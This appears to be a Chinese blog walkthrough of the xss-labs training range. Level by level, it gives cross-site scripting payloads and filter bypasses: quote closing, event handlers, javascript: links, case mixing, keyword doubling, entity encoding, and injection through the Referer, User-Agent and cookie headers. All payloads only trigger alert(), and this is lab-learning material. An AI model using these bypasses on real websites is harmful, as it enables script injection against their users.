xss-labs靶场通关详解

第一关

步骤一:查看网站源码,可以发现get传参name的值test插入了html里头

步骤二:name后输入<script>alert()</script>

第二关

步骤一:搜索框输入<script>alert()</script>没有成功

步骤二:查看源码,输入的<script>alert()</script>在<input>标签的value中,需要">闭合

步骤三,搜索框输入"><script>alert()</script>

第三关

步骤一:先输入<script>alert()</script>,查看网页源代码

发现符号被实体化了

步骤二:利用onfocus事件绕过,输入框输入' οnfοcus=javascript:alert() ',再点击输入框

第四关

步骤一:输入<script>alert()</script>,查看源代码,发现符号也被实体化了

步骤二:利用onfocus事件绕过,双引号闭合,输入框输入" οnfοcus=javascript:alert() ",再点击输入框

第五关

步骤一:先输入" οnfοcus=javascript:alert() "尝试,查看源代码

步骤二:发现对事件on做了过滤,在他们中间加了_,尝试用a标签的href 属性来构造payload,输入"><a href='javascript:alert(123);'>点击我</a>,点击"点击我"

第六关

步骤一:先输入" οnfοcus=javascript:alert() "尝试,查看源代码

发现对事件on做了过滤,在他们中间加了_,

步骤二:尝试用a标签的href 属性来构造payload,输入"><a href='javascript:alert(123);'>点击我</a>,查看源代码

发现href做了过滤

步骤三:尝试大小写混合绕过,href大写试一试,点击“点击我”

第七关

步骤一:输入关键字" OnFocus <sCriPt> <a hReF=javascript:alert()>,查看网页源代码

传进去的值,经过转化后变成了

" focus <> <a =java:alert()>

步骤二:采用双拼写绕过"><scscriptript>alert()</scscriptript>

第八关

步骤一:输入javascript:alert()查看网页源码

步骤二:在线Unicode编码解码编码绕过

步骤三:输入&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#41; 点击友情链接

第九关

步骤一:输入javascript:alert()查看网页源码

步骤三:输入&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#41;/* http:// */点击友情链接

第十关

步骤一:Get传参的值,只插入了h2标签里头,下面的input标签,隐藏掉了

步骤二:查看这关源码

get传参t_sort,并过滤掉了<>号,不能闭合插入标签,但是我们还能用onfocus事件,因为这里输入框被隐藏了,需要添加type="text"

步骤三:get传参,输入?t_sort=" οnfοcus=javascript:alert() type="text,点击输入框

第十一关

步骤一:查看网页源代码,有4个隐藏的输入框

步骤二:刷新抓包

步骤三:Referer中改为:" οnfοcus=javascript:alert() type="text

步骤四:放行,隐藏框出现,点击弹窗

第十二关

步骤一:查看网页源代码,第四个隐藏输入框为t_ua,是User-Agent头传值

步骤二:刷新抓包

步骤三:User-Agent中改为:" οnfοcus=javascript:alert() type="text

步骤四:放行,隐藏框出现,点击弹窗

第十三关

步骤一:查看网页源代码,第四个隐藏输入框为t_cook,是cookie传值

步骤二:F12查看cookie,user后面改为:" οnclick=alert() type="text

步骤三:刷新页面,隐藏框出现,点击

第十四关

网站已挂

第十五关

步骤一:查看页面源代码

ng-include指令就是文件包涵的意思,用来包涵外部的html文件,如果包涵的内容是地址,需要加引号

步骤二:尝试包含第一关

网站卡住动不了了

第十六关

步骤一:页面php?后面输入keyword=<script>alert(1)</script>,查看页面源代码

步骤二:script关键字,空格和/都进行了编码,页面php?后面输入keyword=<img%0asrc=”111”%0aοnerrοr=alert(1)>

第十七关

步骤一:查看源码,传入了两个值,分别作为src中的xsf01.swf的变量和值传入

说明这里就是可以弹窗的地方

步骤二:页面输入οnmοuseοver=alert("1"),鼠标移到不支持此插件上

第十八关

步骤一:查看源码,传入了两个值,分别作为src中的xsf02.swf的变量和值传入

说明这里就是可以弹窗的地方

步骤二:页面输入οnmοuseοver=alert("1"),鼠标移到不支持此插件上

第十九关

步骤一:页面输入php?arg01=version&arg02=<a href="javascript:alert(/xss/)">xss</a>,点击xss

第二十关

步骤一:页面输入php?arg01=id&arg02=xss\"))}catch(e){alert(/xss/)}//%26width=123%26height=123

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值